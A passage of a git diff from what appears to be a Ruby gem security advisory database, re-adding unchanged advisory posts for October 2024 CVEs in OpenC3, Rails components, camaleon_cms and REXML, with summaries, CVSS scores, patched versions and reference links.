+    - https://github.com/decidim/decidim/commit/8a18c8b1ee85a1b35ee0d8d5893f218695d15637
+    - https://github.com/advisories/GHSA-cc4g-m3g7-xmw8
+---
diff --git a/advisories/_posts/2024-10-02-CVE-2024-43795.md b/advisories/_posts/2024-10-02-CVE-2024-43795.md
index d66b19ea..e2c8d28c 100644
--- a/advisories/_posts/2024-10-02-CVE-2024-43795.md
+++ b/advisories/_posts/2024-10-02-CVE-2024-43795.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2024-43795 (openc3): OpenC3 Cross-site Scripting in Login functionality
-  (`GHSL-2024-128`)'
-comments: false
-categories:
-- openc3
-advisory:
-  gem: openc3
-  cve: 2024-43795
-  ghsa: vfj8-5pj7-2f9g
-  url: https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g
-  title: OpenC3 Cross-site Scripting in Login functionality (`GHSL-2024-128`)
-  date: 2024-10-02
-  description: |
-    ### Summary
-
-    The login functionality contains a reflected cross-site scripting
-    (XSS) vulnerability.
-
-    Note: This CVE only affects Open Source Edition, and not
-    OpenC3 COSMOS Enterprise Edition
-
-    ### Impact
-    This issue may lead up to Remote Code Execution (RCE).
-
-    **NOTE:** The complete advisory with much more information is added as
-    [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g#advisory-comment-104904).
-  cvss_v3: 6.1
-  cvss_v4: 5.1
-  patched_versions:
-  - ">= 5.19.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-43795
-    - https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g
-    - https://github.com/OpenC3/cosmos/commit/762d7e0e93bdc2f340b1e42acccedc78994a576e
-    - https://github.com/advisories/GHSA-vfj8-5pj7-2f9g
----
+---
+layout: advisory
+title: 'CVE-2024-43795 (openc3): OpenC3 Cross-site Scripting in Login functionality
+  (`GHSL-2024-128`)'
+comments: false
+categories:
+- openc3
+advisory:
+  gem: openc3
+  cve: 2024-43795
+  ghsa: vfj8-5pj7-2f9g
+  url: https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g
+  title: OpenC3 Cross-site Scripting in Login functionality (`GHSL-2024-128`)
+  date: 2024-10-02
+  description: |
+    ### Summary
+
+    The login functionality contains a reflected cross-site scripting
+    (XSS) vulnerability.
+
+    Note: This CVE only affects Open Source Edition, and not
+    OpenC3 COSMOS Enterprise Edition
+
+    ### Impact
+    This issue may lead up to Remote Code Execution (RCE).
+
+    **NOTE:** The complete advisory with much more information is added as
+    [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g#advisory-comment-104904).
+  cvss_v3: 6.1
+  cvss_v4: 5.1
+  patched_versions:
+  - ">= 5.19.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43795
+    - https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g
+    - https://github.com/OpenC3/cosmos/commit/762d7e0e93bdc2f340b1e42acccedc78994a576e
+    - https://github.com/advisories/GHSA-vfj8-5pj7-2f9g
+---
diff --git a/advisories/_posts/2024-10-02-CVE-2024-46977.md b/advisories/_posts/2024-10-02-CVE-2024-46977.md
index 1e0d0809..f9429dcb 100644
--- a/advisories/_posts/2024-10-02-CVE-2024-46977.md
+++ b/advisories/_posts/2024-10-02-CVE-2024-46977.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2024-46977 (openc3): OpenC3 Path Traversal via screen controller (`GHSL-2024-127`)'
-comments: false
-categories:
-- openc3
-advisory:
-  gem: openc3
-  cve: 2024-46977
-  ghsa: 8jxr-mccc-mwg8
-  url: https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8
-  title: OpenC3 Path Traversal via screen controller (`GHSL-2024-127`)
-  date: 2024-10-02
-  description: |
-    ### Summary
-
-    A path traversal vulnerability inside of `LocalMode`'s
-    `open_local_file` method allows an authenticated user with
-    adequate permissions to download any `.txt` via the
-    `ScreensController#show` on the web server COSMOS is running
-    on (depending on the file permissions).
-
-    Note: This CVE affects all OpenC3 COSMOS Editions
-
-    ### Impact
-
-    This issue may lead to Information Disclosure.
-
-    **NOTE:** The complete advisory with much more information is added as
-    [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8#advisory-comment-104903).
-  cvss_v3: 6.5
-  cvss_v4: 5.3
-  patched_versions:
-  - ">= 5.19.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-46977
-    - https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8
-    - https://github.com/OpenC3/cosmos/commit/a34e61aea5a465f0ab3e57d833ae7ff4cafd710b
-    - https://github.com/advisories/GHSA-8jxr-mccc-mwg8
----
+---
+layout: advisory
+title: 'CVE-2024-46977 (openc3): OpenC3 Path Traversal via screen controller (`GHSL-2024-127`)'
+comments: false
+categories:
+- openc3
+advisory:
+  gem: openc3
+  cve: 2024-46977
+  ghsa: 8jxr-mccc-mwg8
+  url: https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8
+  title: OpenC3 Path Traversal via screen controller (`GHSL-2024-127`)
+  date: 2024-10-02
+  description: |
+    ### Summary
+
+    A path traversal vulnerability inside of `LocalMode`'s
+    `open_local_file` method allows an authenticated user with
+    adequate permissions to download any `.txt` via the
+    `ScreensController#show` on the web server COSMOS is running
+    on (depending on the file permissions).
+
+    Note: This CVE affects all OpenC3 COSMOS Editions
+
+    ### Impact
+
+    This issue may lead to Information Disclosure.
+
+    **NOTE:** The complete advisory with much more information is added as
+    [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8#advisory-comment-104903).
+  cvss_v3: 6.5
+  cvss_v4: 5.3
+  patched_versions:
+  - ">= 5.19.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-46977
+    - https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8
+    - https://github.com/OpenC3/cosmos/commit/a34e61aea5a465f0ab3e57d833ae7ff4cafd710b
+    - https://github.com/advisories/GHSA-8jxr-mccc-mwg8
+---
diff --git a/advisories/_posts/2024-10-02-CVE-2024-47529.md b/advisories/_posts/2024-10-02-CVE-2024-47529.md
index 19e51634..8b83f7c7 100644
--- a/advisories/_posts/2024-10-02-CVE-2024-47529.md
+++ b/advisories/_posts/2024-10-02-CVE-2024-47529.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2024-47529 (openc3): OpenC3 stores passwords in clear text (`GHSL-2024-129`)'
-comments: false
-categories:
-- openc3
-advisory:
-  gem: openc3
-  cve: 2024-47529
-  ghsa: 4xqv-47rm-37mm
-  url: https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm
-  title: OpenC3 stores passwords in clear text (`GHSL-2024-129`)
-  date: 2024-10-02
-  description: |
-    ### Summary
-
-    OpenC3 COSMOS stores the password of a user unencrypted in the
-    LocalStorage of a web browser. This makes the user password
-    susceptible to exfiltration via Cross-site scripting (see GHSL-2024-128).
-
-    Note: This CVE only affects Open Source edition, and not
-    OpenC3 COSMOS Enterprise Edition
-
-    ### Impact
-
-    This issue may lead to Information Disclosure.
-
-    **NOTE:** The complete advisory with much more information is added as
-    [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm#advisory-comment-104905).
-  cvss_v3: 5.9
-  cvss_v4: 4.8
-  patched_versions:
-  - ">= 5.19.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-47529
-    - https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm
-    - https://github.com/OpenC3/cosmos/commit/b5ab34fe7fa54c0c8171c4aa3caf4e03d6f63bd7
-    - https://github.com/advisories/GHSA-4xqv-47rm-37mm
----
+---
+layout: advisory
+title: 'CVE-2024-47529 (openc3): OpenC3 stores passwords in clear text (`GHSL-2024-129`)'
+comments: false
+categories:
+- openc3
+advisory:
+  gem: openc3
+  cve: 2024-47529
+  ghsa: 4xqv-47rm-37mm
+  url: https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm
+  title: OpenC3 stores passwords in clear text (`GHSL-2024-129`)
+  date: 2024-10-02
+  description: |
+    ### Summary
+
+    OpenC3 COSMOS stores the password of a user unencrypted in the
+    LocalStorage of a web browser. This makes the user password
+    susceptible to exfiltration via Cross-site scripting (see GHSL-2024-128).
+
+    Note: This CVE only affects Open Source edition, and not
+    OpenC3 COSMOS Enterprise Edition
+
+    ### Impact
+
+    This issue may lead to Information Disclosure.
+
+    **NOTE:** The complete advisory with much more information is added as
+    [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm#advisory-comment-104905).
+  cvss_v3: 5.9
+  cvss_v4: 4.8
+  patched_versions:
+  - ">= 5.19.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-47529
+    - https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm
+    - https://github.com/OpenC3/cosmos/commit/b5ab34fe7fa54c0c8171c4aa3caf4e03d6f63bd7
+    - https://github.com/advisories/GHSA-4xqv-47rm-37mm
+---
diff --git a/advisories/_posts/2024-10-15-CVE-2024-41128.md b/advisories/_posts/2024-10-15-CVE-2024-41128.md
index 40296bbb..c5bdac91 100644
--- a/advisories/_posts/2024-10-15-CVE-2024-41128.md
+++ b/advisories/_posts/2024-10-15-CVE-2024-41128.md
@@ -1,58 +1,58 @@
----
-layout: advisory
-title: 'CVE-2024-41128 (actionpack): Possible ReDoS vulnerability in query parameter
-  filtering in Action Dispatch'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2024-41128
-  ghsa: x76w-6vjr-8xgj
-  url: https://github.com/rails/rails/security/advisories/GHSA-x76w-6vjr-8xgj
-  title: Possible ReDoS vulnerability in query parameter filtering in Action Dispatch
-  date: 2024-10-15
-  description: |
-    There is a possible ReDoS vulnerability in the query parameter
-    filtering routines of Action Dispatch. This vulnerability has
-    been assigned the CVE identifier CVE-2024-41128.
-
-    ## Impact
-
-    Carefully crafted query parameters can cause query parameter
-    filtering to take an unexpected amount of time, possibly resulting
-    in a DoS vulnerability. All users running an affected release
-    should either upgrade or apply the relevant patch immediately.
-
-    Ruby 3.2 has mitigations for this problem, so Rails applications
-    using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends
-    on Ruby 3.2 or greater so is unaffected.
-
-    ## Releases
-
-    The fixed releases are available at the normal locations.
-
-    ## Workarounds
-
-    Users on Ruby 3.2 are unaffected by this issue.
-
-    ## Credits
-
-    Thanks to [scyoon](https://hackerone.com/scyoon) for the report and patches!
-  cvss_v4: 6.6
-  unaffected_versions:
-  - "< 3.1.0"
-  patched_versions:
-  - "~> 6.1.7.9"
-  - "~> 7.0.8, >= 7.0.8.5"
-  - "~> 7.1.4, >= 7.1.4.1"
-  - ">= 7.2.1.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-41128
-    - https://github.com/rails/rails/security/advisories/GHSA-x76w-6vjr-8xgj
-    - https://hackerone.com/reports/2872502
-    - https://github.com/advisories/GHSA-x76w-6vjr-8xgj
----
+---
+layout: advisory
+title: 'CVE-2024-41128 (actionpack): Possible ReDoS vulnerability in query parameter
+  filtering in Action Dispatch'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2024-41128
+  ghsa: x76w-6vjr-8xgj
+  url: https://github.com/rails/rails/security/advisories/GHSA-x76w-6vjr-8xgj
+  title: Possible ReDoS vulnerability in query parameter filtering in Action Dispatch
+  date: 2024-10-15
+  description: |
+    There is a possible ReDoS vulnerability in the query parameter
+    filtering routines of Action Dispatch. This vulnerability has
+    been assigned the CVE identifier CVE-2024-41128.
+
+    ## Impact
+
+    Carefully crafted query parameters can cause query parameter
+    filtering to take an unexpected amount of time, possibly resulting
+    in a DoS vulnerability. All users running an affected release
+    should either upgrade or apply the relevant patch immediately.
+
+    Ruby 3.2 has mitigations for this problem, so Rails applications
+    using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends
+    on Ruby 3.2 or greater so is unaffected.
+
+    ## Releases
+
+    The fixed releases are available at the normal locations.
+
+    ## Workarounds
+
+    Users on Ruby 3.2 are unaffected by this issue.
+
+    ## Credits
+
+    Thanks to [scyoon](https://hackerone.com/scyoon) for the report and patches!
+  cvss_v4: 6.6
+  unaffected_versions:
+  - "< 3.1.0"
+  patched_versions:
+  - "~> 6.1.7.9"
+  - "~> 7.0.8, >= 7.0.8.5"
+  - "~> 7.1.4, >= 7.1.4.1"
+  - ">= 7.2.1.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-41128
+    - https://github.com/rails/rails/security/advisories/GHSA-x76w-6vjr-8xgj
+    - https://hackerone.com/reports/2872502
+    - https://github.com/advisories/GHSA-x76w-6vjr-8xgj
+---
diff --git a/advisories/_posts/2024-10-15-CVE-2024-47887.md b/advisories/_posts/2024-10-15-CVE-2024-47887.md
index 8132d620..bc7b7320 100644
--- a/advisories/_posts/2024-10-15-CVE-2024-47887.md
+++ b/advisories/_posts/2024-10-15-CVE-2024-47887.md
@@ -1,57 +1,57 @@
----
-layout: advisory
-title: 'CVE-2024-47887 (actionpack): Possible ReDoS vulnerability in HTTP Token authentication
-  in Action Controller'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2024-47887
-  ghsa: vfg9-r3fq-jvx4
-  url: https://github.com/rails/rails/security/advisories/GHSA-vfg9-r3fq-jvx4
-  title: Possible ReDoS vulnerability in HTTP Token authentication in Action Controller
-  date: 2024-10-15
-  description: |
-    There is a possible ReDoS vulnerability in Action Controller's
-    HTTP Token authentication. This vulnerability has been assigned
-    the CVE identifier CVE-2024-47887.
-
-    ## Impact
-
-    For applications using HTTP Token authentication via
-    `authenticate_or_request_with_http_token` or similar, a carefully
-    crafted header may cause header parsing to take an unexpected amount
-    of time, possibly resulting in a DoS vulnerability. All users running
-    an affected release should either upgrade or apply the relevant
-    patch immediately.
-
-    Ruby 3.2 has mitigations for this problem, so Rails applications
-    using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends
-    on Ruby 3.2 or greater so is unaffected.
-
-    ## Releases
-
-    The fixed releases are available at the normal locations.
-
-    ## Workarounds
-
-    Users on Ruby 3.2 are unaffected by this issue.
-
-    ## Credits
-
-    Thanks to [scyoon](https://hackerone.com/scyoon) for reporting
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - "~> 6.1.7.9"
-  - "~> 7.0.8, >= 7.0.8.5"
-  - "~> 7.1.4, >= 7.1.4.1"
-  - ">= 7.2.1.1"
-  related:
-    url:
-    - https://github.com/rails/rails/security/advisories/GHSA-vfg9-r3fq-jvx4
-    - https://github.com/advisories/GHSA-vfg9-r3fq-jvx4
----
+---
+layout: advisory
+title: 'CVE-2024-47887 (actionpack): Possible ReDoS vulnerability in HTTP Token authentication
+  in Action Controller'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2024-47887
+  ghsa: vfg9-r3fq-jvx4
+  url: https://github.com/rails/rails/security/advisories/GHSA-vfg9-r3fq-jvx4
+  title: Possible ReDoS vulnerability in HTTP Token authentication in Action Controller
+  date: 2024-10-15
+  description: |
+    There is a possible ReDoS vulnerability in Action Controller's
+    HTTP Token authentication. This vulnerability has been assigned
+    the CVE identifier CVE-2024-47887.
+
+    ## Impact
+
+    For applications using HTTP Token authentication via
+    `authenticate_or_request_with_http_token` or similar, a carefully
+    crafted header may cause header parsing to take an unexpected amount
+    of time, possibly resulting in a DoS vulnerability. All users running
+    an affected release should either upgrade or apply the relevant
+    patch immediately.
+
+    Ruby 3.2 has mitigations for this problem, so Rails applications
+    using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends
+    on Ruby 3.2 or greater so is unaffected.
+
+    ## Releases
+
+    The fixed releases are available at the normal locations.
+
+    ## Workarounds
+
+    Users on Ruby 3.2 are unaffected by this issue.
+
+    ## Credits
+
+    Thanks to [scyoon](https://hackerone.com/scyoon) for reporting
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - "~> 6.1.7.9"
+  - "~> 7.0.8, >= 7.0.8.5"
+  - "~> 7.1.4, >= 7.1.4.1"
+  - ">= 7.2.1.1"
+  related:
+    url:
+    - https://github.com/rails/rails/security/advisories/GHSA-vfg9-r3fq-jvx4
+    - https://github.com/advisories/GHSA-vfg9-r3fq-jvx4
+---
diff --git a/advisories/_posts/2024-10-15-CVE-2024-47888.md b/advisories/_posts/2024-10-15-CVE-2024-47888.md
index 5381f4f0..204f7e7d 100644
--- a/advisories/_posts/2024-10-15-CVE-2024-47888.md
+++ b/advisories/_posts/2024-10-15-CVE-2024-47888.md
@@ -1,58 +1,58 @@
----
-layout: advisory
-title: 'CVE-2024-47888 (actiontext): Possible ReDoS vulnerability in plain_text_for_blockquote_node
-  in Action Text'
-comments: false
-categories:
-- actiontext
-- rails
-advisory:
-  gem: actiontext
-  framework: rails
-  cve: 2024-47888
-  ghsa: wwhv-wxv9-rpgw
-  url: https://github.com/rails/rails/security/advisories/GHSA-wwhv-wxv9-rpgw
-  title: Possible ReDoS vulnerability in plain_text_for_blockquote_node in Action
-    Text
-  date: 2024-10-15
-  description: |
-    There is a possible ReDoS vulnerability in the
-    plain_text_for_blockquote_node helper in Action Text. This
-    vulnerability has been assigned the CVE identifier CVE-2024-47888.
-
-    ## Impact
-
-    Carefully crafted text can cause the plain_text_for_blockquote_node
-    helper to take an unexpected amount of time, possibly resulting
-    in a DoS vulnerability. All users running an affected release should
-    either upgrade or apply the relevant patch immediately.
-
-    Ruby 3.2 has mitigations for this problem, so Rails applications
-    using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends
-    on Ruby 3.2 or greater so is unaffected.
-
-    ## Releases
-
-    The fixed releases are available at the normal locations.
-
-    ## Workarounds
-
-    Users can avoid calling `plain_text_for_blockquote_node` or
-    upgrade to Ruby 3.2.
-
-    ## Credits
-
-    Thanks to [ooooooo_q](https://hackerone.com/ooooooo_q) for the report!
-  unaffected_versions:
-  - "< 6.0.0"
-  patched_versions:
-  - "~> 6.1.7.9"
-  - "~> 7.0.8, >= 7.0.8.5"
-  - "~> 7.1.4, >= 7.1.4.1"
-  - ">= 7.2.1.1"
-  related:
-    url:
-    - https://github.com/rails/rails/security/advisories/GHSA-wwhv-wxv9-rpgw
-    - https://hackerone.com/reports/2792776
-    - https://github.com/advisories/GHSA-wwhv-wxv9-rpgw
----
+---
+layout: advisory
+title: 'CVE-2024-47888 (actiontext): Possible ReDoS vulnerability in plain_text_for_blockquote_node
+  in Action Text'
+comments: false
+categories:
+- actiontext
+- rails
+advisory:
+  gem: actiontext
+  framework: rails
+  cve: 2024-47888
+  ghsa: wwhv-wxv9-rpgw
+  url: https://github.com/rails/rails/security/advisories/GHSA-wwhv-wxv9-rpgw
+  title: Possible ReDoS vulnerability in plain_text_for_blockquote_node in Action
+    Text
+  date: 2024-10-15
+  description: |
+    There is a possible ReDoS vulnerability in the
+    plain_text_for_blockquote_node helper in Action Text. This
+    vulnerability has been assigned the CVE identifier CVE-2024-47888.
+
+    ## Impact
+
+    Carefully crafted text can cause the plain_text_for_blockquote_node
+    helper to take an unexpected amount of time, possibly resulting
+    in a DoS vulnerability. All users running an affected release should
+    either upgrade or apply the relevant patch immediately.
+
+    Ruby 3.2 has mitigations for this problem, so Rails applications
+    using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 depends
+    on Ruby 3.2 or greater so is unaffected.
+
+    ## Releases
+
+    The fixed releases are available at the normal locations.
+
+    ## Workarounds
+
+    Users can avoid calling `plain_text_for_blockquote_node` or
+    upgrade to Ruby 3.2.
+
+    ## Credits
+
+    Thanks to [ooooooo_q](https://hackerone.com/ooooooo_q) for the report!
+  unaffected_versions:
+  - "< 6.0.0"
+  patched_versions:
+  - "~> 6.1.7.9"
+  - "~> 7.0.8, >= 7.0.8.5"
+  - "~> 7.1.4, >= 7.1.4.1"
+  - ">= 7.2.1.1"
+  related:
+    url:
+    - https://github.com/rails/rails/security/advisories/GHSA-wwhv-wxv9-rpgw
+    - https://hackerone.com/reports/2792776
+    - https://github.com/advisories/GHSA-wwhv-wxv9-rpgw
+---
diff --git a/advisories/_posts/2024-10-15-CVE-2024-47889.md b/advisories/_posts/2024-10-15-CVE-2024-47889.md
index dd48a1d5..abde2f4d 100644
--- a/advisories/_posts/2024-10-15-CVE-2024-47889.md
+++ b/advisories/_posts/2024-10-15-CVE-2024-47889.md
@@ -1,56 +1,56 @@
----
-layout: advisory
-title: 'CVE-2024-47889 (actionmailer): Possible ReDoS vulnerability in block_format
-  in Action Mailer'
-comments: false
-categories:
-- actionmailer
-- rails
-advisory:
-  gem: actionmailer
-  framework: rails
-  cve: 2024-47889
-  ghsa: h47h-mwp9-c6q6
-  url: https://github.com/rails/rails/security/advisories/GHSA-h47h-mwp9-c6q6
-  title: Possible ReDoS vulnerability in block_format in Action Mailer
-  date: 2024-10-15
-  description: |
-    There is a possible ReDoS vulnerability in the block_format helper
-    in Action Mailer. This vulnerability has been assigned the
-    CVE identifier CVE-2024-47889.
-
-    ## Impact
-
-    Carefully crafted text can cause the block_format helper to take an
-    unexpected amount of time, possibly resulting in a DoS vulnerability.
-    All users running an affected release should either upgrade or apply
-    the relevant patch immediately.
-
-    Ruby 3.2 has mitigations for this problem, so Rails applications
-    using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 requires
-    Ruby 3.2 or greater so is unaffected.
-
-    ## Releases
-
-    The fixed releases are available at the normal locations.
-
-    ## Workarounds
-
-    Users can avoid calling the `block_format` helper or upgrade
-    to Ruby 3.2.
-
-    ##Credits
-
-    Thanks to [ooooooo_q](https://hackerone.com/ooooooo_q) for the report!
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 6.1.7.9"
-  - "~> 7.0.8, >= 7.0.8.5"
-  - "~> 7.1.4, >= 7.1.4.1"
-  - ">= 7.2.1.1"
-  related:
-    url:
-    - https://github.com/rails/rails/security/advisories/GHSA-h47h-mwp9-c6q6
-    - https://github.com/advisories/GHSA-h47h-mwp9-c6q6
----
+---
+layout: advisory
+title: 'CVE-2024-47889 (actionmailer): Possible ReDoS vulnerability in block_format
+  in Action Mailer'
+comments: false
+categories:
+- actionmailer
+- rails
+advisory:
+  gem: actionmailer
+  framework: rails
+  cve: 2024-47889
+  ghsa: h47h-mwp9-c6q6
+  url: https://github.com/rails/rails/security/advisories/GHSA-h47h-mwp9-c6q6
+  title: Possible ReDoS vulnerability in block_format in Action Mailer
+  date: 2024-10-15
+  description: |
+    There is a possible ReDoS vulnerability in the block_format helper
+    in Action Mailer. This vulnerability has been assigned the
+    CVE identifier CVE-2024-47889.
+
+    ## Impact
+
+    Carefully crafted text can cause the block_format helper to take an
+    unexpected amount of time, possibly resulting in a DoS vulnerability.
+    All users running an affected release should either upgrade or apply
+    the relevant patch immediately.
+
+    Ruby 3.2 has mitigations for this problem, so Rails applications
+    using Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 requires
+    Ruby 3.2 or greater so is unaffected.
+
+    ## Releases
+
+    The fixed releases are available at the normal locations.
+
+    ## Workarounds
+
+    Users can avoid calling the `block_format` helper or upgrade
+    to Ruby 3.2.
+
+    ##Credits
+
+    Thanks to [ooooooo_q](https://hackerone.com/ooooooo_q) for the report!
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 6.1.7.9"
+  - "~> 7.0.8, >= 7.0.8.5"
+  - "~> 7.1.4, >= 7.1.4.1"
+  - ">= 7.2.1.1"
+  related:
+    url:
+    - https://github.com/rails/rails/security/advisories/GHSA-h47h-mwp9-c6q6
+    - https://github.com/advisories/GHSA-h47h-mwp9-c6q6
+---
diff --git a/advisories/_posts/2024-10-23-CVE-2024-48652.md b/advisories/_posts/2024-10-23-CVE-2024-48652.md
index 885fb8d8..f6f38bf9 100644
--- a/advisories/_posts/2024-10-23-CVE-2024-48652.md
+++ b/advisories/_posts/2024-10-23-CVE-2024-48652.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2024-48652 (camaleon_cms): camaleon_cms affected by cross site scripting'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2024-48652
-  ghsa: hhxg-rvc9-8726
-  url: https://github.com/paragbagul111/CVE-2024-48652
-  title: camaleon_cms affected by cross site scripting
-  date: 2024-10-23
-  description: |
-    Cross Site Scripting vulnerability in camaleon-cms v.2.7.5 allows
-    remote attacker to execute arbitrary code via the content group
-    name field.
-  cvss_v3: 4.8
-  notes: |
-    Never patched
-
-    Unclear if versions 2.8.0 to 2.8.3 patch this vulnerability.
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-48652
-    - https://github.com/paragbagul111/CVE-2024-48652
-    - https://github.com/advisories/GHSA-hhxg-rvc9-8726
----
+---
+layout: advisory
+title: 'CVE-2024-48652 (camaleon_cms): camaleon_cms affected by cross site scripting'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2024-48652
+  ghsa: hhxg-rvc9-8726
+  url: https://github.com/paragbagul111/CVE-2024-48652
+  title: camaleon_cms affected by cross site scripting
+  date: 2024-10-23
+  description: |
+    Cross Site Scripting vulnerability in camaleon-cms v.2.7.5 allows
+    remote attacker to execute arbitrary code via the content group
+    name field.
+  cvss_v3: 4.8
+  notes: |
+    Never patched
+
+    Unclear if versions 2.8.0 to 2.8.3 patch this vulnerability.
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-48652
+    - https://github.com/paragbagul111/CVE-2024-48652
+    - https://github.com/advisories/GHSA-hhxg-rvc9-8726
+---
diff --git a/advisories/_posts/2024-10-28-CVE-2024-49761.md b/advisories/_posts/2024-10-28-CVE-2024-49761.md
index 7eaa065c..b3687e97 100644
--- a/advisories/_posts/2024-10-28-CVE-2024-49761.md
+++ b/advisories/_posts/2024-10-28-CVE-2024-49761.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2024-49761 (rexml): REXML ReDoS vulnerability'
-comments: false
-categories:
-- rexml
-advisory:
-  gem: rexml
-  cve: 2024-49761
-  ghsa: 2rxp-v6pw-ch6m
-  url: https://github.com/ruby/rexml/security/advisories/GHSA-2rxp-v6pw-ch6m
-  title: REXML ReDoS vulnerability
-  date: 2024-10-28
-  description: |
-    ## Impact
-
-    The REXML gem before 3.3.9 has a ReDoS vulnerability when it
-    parses an XML that has many digits between `&#` and `x...;`
-    in a hex numeric character reference (`&#x...;`).
-
-    This does not happen with Ruby 3.2 or later. Ruby 3.1 is the only
-    affected maintained Ruby. Note that Ruby 3.1 will reach EOL on 2025-03.
-
-    ## Patches
-
-    The REXML gem 3.3.9 or later include the patch to fix the vulnerability.
-
-    ## Workarounds
-
-    Use Ruby 3.2 or later instead of Ruby 3.1.
-
-    ## References
-
-    * https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761
-      * Announced on www.ruby-lang.org.
-  cvss_v3: 7.5
-  cvss_v4: 6.6
-  patched_versions:
-  - ">= 3.3.9"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-49761
-    - https://github.com/ruby/rexml/releases/tag/v3.3.9
-    - https://github.com/ruby/rexml/security/advisories/GHSA-2rxp-v6pw-ch6m
-    - https://github.com/ruby/rexml/commit/ce59f2eb1aeb371fe1643414f06618dbe031979f
-    - https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761
-    - https://hackerone.com/reports/2807139
-    - https://github.com/advisories/GHSA-2rxp-v6pw-ch6m
----
+---
+layout: advisory
+title: 'CVE-2024-49761 (rexml): REXML ReDoS vulnerability'
+comments: false
+categories:
+- rexml
+advisory:
+  gem: rexml
+  cve: 2024-49761
+  ghsa: 2rxp-v6pw-ch6m
+  url: https://github.com/ruby/rexml/security/advisories/GHSA-2rxp-v6pw-ch6m
+  title: REXML ReDoS vulnerability
+  date: 2024-10-28
+  description: |
+    ## Impact
+
+    The REXML gem before 3.3.9 has a ReDoS vulnerability when it
+    parses an XML that has many digits between `&#` and `x...;`
+    in a hex numeric character reference (`&#x...;`).
+
+    This does not happen with Ruby 3.2 or later. Ruby 3.1 is the only
+    affected maintained Ruby. Note that Ruby 3.1 will reach EOL on 2025-03.
+
+    ## Patches
+
+    The REXML gem 3.3.9 or later include the patch to fix the vulnerability.
+
+    ## Workarounds
+
+    Use Ruby 3.2 or later instead of Ruby 3.1.
+
+    ## References
+
+    * https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761
+      * Announced on www.ruby-lang.org.
+  cvss_v3: 7.5
+  cvss_v4: 6.6
+  patched_versions:
+  - ">= 3.3.9"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-49761
+    - https://github.com/ruby/rexml/releases/tag/v3.3.9
+    - https://github.com/ruby/rexml/security/advisories/GHSA-2rxp-v6pw-ch6m
+    - https://github.com/ruby/rexml/commit/ce59f2eb1aeb371fe1643414f06618dbe031979f
+    - https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761
+    - https://hackerone.com/reports/2807139
